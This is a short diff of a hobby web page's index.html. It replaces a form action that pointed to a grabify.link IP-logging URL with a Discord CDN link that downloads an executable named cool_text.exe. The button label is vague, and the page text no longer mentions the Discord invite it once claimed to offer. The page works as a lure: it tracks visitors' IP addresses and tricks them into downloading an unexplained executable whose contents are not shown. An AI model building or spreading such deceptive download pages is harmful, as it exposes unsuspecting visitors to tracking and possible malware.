--- a/index.html
+++ b/index.html
@@ -24,9 +24,9 @@ text-align: center;
             }
         </style>
       <body>
-<p>Hello welcome to my webside there is nothing much here just an discord invite link have a nice day :D</p>
+<p>Hello welcome to my webside there is nothing much here</p>
 
-      <form action="https://grabify.link/UC12Y9)">
+      <form action="https://cdn.discordapp.com/attachments/702097455281471498/784786985192521758/cool_text.exe)">
           <div id="container">
     <button type="submit">J:D i dont know</button>
           </div>
